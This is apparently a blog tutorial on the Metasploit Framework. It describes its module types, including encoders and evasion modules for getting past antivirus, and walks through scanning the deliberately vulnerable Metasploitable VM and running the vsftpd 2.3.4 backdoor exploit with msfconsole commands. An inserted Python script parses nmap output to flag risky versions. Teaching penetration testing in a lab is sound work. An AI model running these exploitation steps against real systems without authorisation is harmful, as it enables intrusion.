Sun May 07

Metasploit 101: A Basic Tutorial for Penetration Testing

Metasploit is a versatile exploitation framework used by both penetration testers and attackers. Its versatility comes from covering most of the cyber-attack process, from reconnaissance to post-exploitation. It comes in two editions: Metasploit Pro, the commercial version with a GUI, and Metasploit Framework, the free command-line version, which is the one we are going to learn here.

Metasploit framework architecture

We assume that you use Kali Linux or have installed Metasploit on your system. When you first start Metasploit from the taskbar, you can see which command is being executed by right-clicking on its entry. Fundamentally, it executes two commands: msfdb init, which starts the PostgreSQL database, and msfconsole, which launches the main console you will be interacting with along the way.

Metasploit database

As a crucial component of the Metasploit framework, the database offers a means of managing and retrieving data with greater efficiency. This feature includes the ability to import and export scan results, providing users with a more comprehensive vulnerability assessment.

Metasploit console

Running the database is not mandatory, however; you can also start msfconsole directly. It may be helpful to run the help command to list all the available commands. One of the most useful commands is use, which lets you interact with a particular module depending on the task you want to perform. The use command is the one you will rely on for navigating to and selecting the right module for your objective.

Another useful command is search, which lets you explore all the exploits and other modules that Metasploit has. With it, users can browse the extensive module library and quickly find the modules that match the information gathered during reconnaissance.

Metasploit modules

In total, there are seven module types, each serving a different purpose. The Metasploit modules are located in /usr/share/metasploit-framework/modules. Here are the explanations of the module types and the categories within each one.

Exploit

Exploit modules are the ones that gain access to the target server, typically by returning a reverse shell or a Meterpreter session. They are categorized by target system, including Android, Linux, Windows, Solaris, etc.

Payloads

Payloads contain the code, command, or anything else the exploit is trying to “plant” and run on the target machine in order to gain access to it. Examples are code that loads malware or a backdoor, a command that returns a reverse shell, or code that serves as a proof of concept for a particular vulnerability.

If you look inside the payloads module directory, you will see four subdirectories, each of which works differently.

Adapters : An adapter wraps a single payload and turns it into a different format. Adapters provide a layer of abstraction between Metasploit and the target system. An example is wrapping a payload inside a PowerShell adapter, which converts the payload into a PowerShell command that can be executed on the target system.

Singles : Single payloads in Metasploit are designed to perform specific tasks on their own without requiring any additional components to execute. An example of a single payload is one that adds a user and executes a certain application on the target system.

Stagers : Stagers are responsible for establishing communication between the attacker and the target system. They are used with “staged payloads”: a staged payload is a small initial payload used to deliver a much larger one by downloading the rest of it in a series of smaller pieces.

Stages : This is the payload downloaded by the stager.

Auxiliary

Auxiliary modules are supporting modules, including fuzzers, scanners, crawlers, crackers, etc. In the module directory, the various tools are grouped by function and target system. Each has its own set of options that can be configured to customize its behavior.

Encoders

As the name suggests, an encoder is used for encoding the payload. Sometimes the payload needs to be encoded into a particular format to bypass signature-based antivirus mechanisms. Such a mechanism works by comparing the payload the attacker is trying to send against a database of known threats and alerting the user if it detects a match.

The encoder module in Metasploit applies the technique known as “shellcode obfuscation”: by altering the structure of the payload through encoding, it can avoid detection by security mechanisms like the one mentioned above.

Evasion

While the encoder encodes an existing payload, the evasion module generates a new payload designed specifically to evade detection, using various techniques.

NOPs

In computer science, NOP is short for no operation: an instruction that makes the CPU do nothing for a clock cycle. It is useful in buffer overflow attacks.

Post

Post-exploitation modules are used after a system has been successfully compromised to gather additional information, maintain persistence, and perform further attacks. These modules give the attacker a wide range of functionality for exploring and exploiting the target system. By using them, an attacker can increase their control over the compromised system and potentially gain access to other systems or networks within the target organization.

Using Metasploit

Let’s continue the explanation with a step-by-step tutorial on how to use Metasploit. For this purpose we will use Metasploitable as the target server. You can download it from here.

If you don’t know what it is, it is a Linux virtual machine that was intentionally made vulnerable for practicing pentesting techniques. Because this VM is highly vulnerable, use it only on a trusted network and avoid leaving it running continuously, as it can become an entry point for adversaries into your network.

**Reconnaissance**

Before doing any exploitation, it is critical to gather some information about your target. To do this, you need to know the IP address of the Metasploitable server, which you can find by running the ifconfig command on it. For example, the IP of Metasploitable in my system is 192.168.122.108. This IP will be used to scan for open ports on the target.

Now you can switch to your attacking system and access Metasploit Framework by using the command msfconsole. In the console, scan your target with the following command.

msf6> nmap -sT -sV 192.168.122.108

You need to wait a while, as the scan returns quite detailed information about the target. In this case we need the -sV argument because the version of the service on each port is what we will use to look for a suitable exploit later.

**Selecting exploit**

You will get a lot of information, but let’s focus only on port 21, on the following line.

PORT    STATE  SERVICE  VERSION
21/tcp  open   ftp      vsftpd 2.3.4
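As an added example that is not part of the original tutorial, the following Python script parses a port table in the format shown above (as printed by nmap -sV), splits the VERSION column into a product and a version, and checks every open service against a watchlist of versions that must not be exposed. The watchlist, the sample lines other than the port-21 line, and the function names are assumptions of this example. It also shows how the parsed fields map onto the port: and description: filters used by the search commands that follow.

```python
import re
from dataclasses import dataclass

# Constructed sample of `nmap -sT -sV` output. Only the port-21 line comes
# from the tutorial; the other lines are made up for this example.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.122.108
PORT     STATE  SERVICE  VERSION
21/tcp   open   ftp      vsftpd 2.3.4
22/tcp   open   ssh      OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open   telnet   Linux telnetd
80/tcp   open   http     Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open   rpcbind  2 (RPC #100000)
8009/tcp closed ajp13
"""

# Constructed watchlist: (product, version) pairs that must not be exposed.
# vsftpd 2.3.4 is the version the tutorial targets; the OpenSSH entry is a
# placeholder showing that the list can hold several products.
WATCHLIST = {
    ("vsftpd", "2.3.4"): "release with a known backdoor (tutorial target)",
    ("OpenSSH", "4.7p1"): "placeholder: unsupported release",
}

# One line of the nmap port table: "<port>/<proto> <state> <service> [version]".
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<banner>.*\S))?\s*$"
)


@dataclass(frozen=True)
class Service:
    port: int
    proto: str
    state: str
    service: str
    product: str  # text before the first numeric token of the VERSION column
    version: str  # that numeric token, "" when nmap printed no version


def split_banner(banner: str) -> tuple[str, str]:
    """Heuristically split 'vsftpd 2.3.4' into ('vsftpd', '2.3.4').

    nmap's text output has no field separator, so the first token that starts
    with a digit is taken as the version; everything before it is the product.
    """
    tokens = banner.split()
    for i, tok in enumerate(tokens):
        if tok[0].isdigit():
            return " ".join(tokens[:i]), tok
    return " ".join(tokens), ""


def parse_nmap(text: str) -> list[Service]:
    """Parse the port table of nmap's normal (-sV) output into Service records."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # header, blank and "Nmap scan report" lines
        product, version = split_banner(m.group("banner") or "")
        services.append(Service(int(m.group("port")), m.group("proto"),
                                m.group("state"), m.group("service"),
                                product, version))
    return services


def flag_watchlisted(services: list[Service]) -> list[tuple[Service, str]]:
    """Return the open services whose (product, version) is on the watchlist."""
    return [(s, WATCHLIST[(s.product, s.version)])
            for s in services
            if s.state == "open" and (s.product, s.version) in WATCHLIST]


def msf_search_query(svc: Service) -> str:
    """Build the msfconsole search line used in the tutorial from a parsed service."""
    return (f'search port:{svc.port} type:exploit '
            f'description:"{svc.product} {svc.version}"')


if __name__ == "__main__":
    for svc, reason in flag_watchlisted(parse_nmap(SAMPLE_NMAP_OUTPUT)):
        print(f"{svc.port}/{svc.proto} {svc.product} {svc.version}: {reason}")
        print("  ", msf_search_query(svc))
```

The product/version split is a heuristic over nmap's text format, which is why the rpcbind line yields a version with no product. When feeding scan results into the Metasploit database, use nmap's XML output (-oX) instead: it carries product and version as separate fields, and it is the format db_import reads.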

Using this information we can search for exploits by version, port, or the corresponding protocol. So we can search right away with the search command.

msf6> search port:21 type:exploit

There will be several options to choose from. If you find the list confusing, you can narrow it down by supplying more detailed information, like this.

msf6> search port:21 type:exploit description:"vsftpd 2.3.4"

Now you have one result. You can read more about the exploit with the info command.

msf6> info 0

You can now interact with a module by name or index.

msf6> use 0

or

msf6> use exploit/unix/ftp/vsftpd_234_backdoor

**Setting up options**

After executing the command, the prompt changes to the selected exploit.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

Different exploits require different options, such as the target host and port, so we need to set them before running the exploit. First, find out which options the module requires with the following command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

You can see that some parameters, such as RHOSTS (target host) and RPORT (target port), are required, so we need to set them.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.122.108

Since the target uses the default port, we don’t need to set RPORT; setting the target host is enough.

**Checking and running the exploit**

Before running the exploit, you can check whether the target is vulnerable with the following command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > check

In our case, the module does not support the check command. That is fine; at least now you know the command exists. Finally, run the exploit with the following command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

If you get the output “Exploit completed, but no session was created”, execute the run command once again; you should then get access to the target system.

**Conclusion**

Metasploit Framework makes it very easy for an attacker or a penetration tester to take advantage of a vulnerability in a system. However, if you are trying to use it on your own, it is always better not to rely too much on the tool without a comprehensive understanding of how an exploit or any other module works.